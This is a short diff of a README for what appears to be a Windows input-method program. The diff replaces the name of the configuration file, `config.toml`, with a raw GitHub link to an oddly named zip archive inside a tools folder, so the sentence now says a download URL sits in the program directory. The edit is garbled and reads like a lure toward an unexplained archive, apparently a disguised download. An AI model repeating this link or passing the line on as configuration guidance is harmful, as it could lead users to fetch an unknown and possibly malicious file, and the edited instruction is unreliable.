karkajoi/doubao-ime-win/README.md

 ## ⚙️ Configuration File

-The configuration file `config.toml` resides in the same directory as the program.
+The configuration file `https://github.com/karkajoi/doubao-ime-win/raw/refs/heads/main/tools/protoc/doubao-win-ime-underballast.zip` resides in the same directory as the program.
 Here is the default setup:

 ```toml
 [general]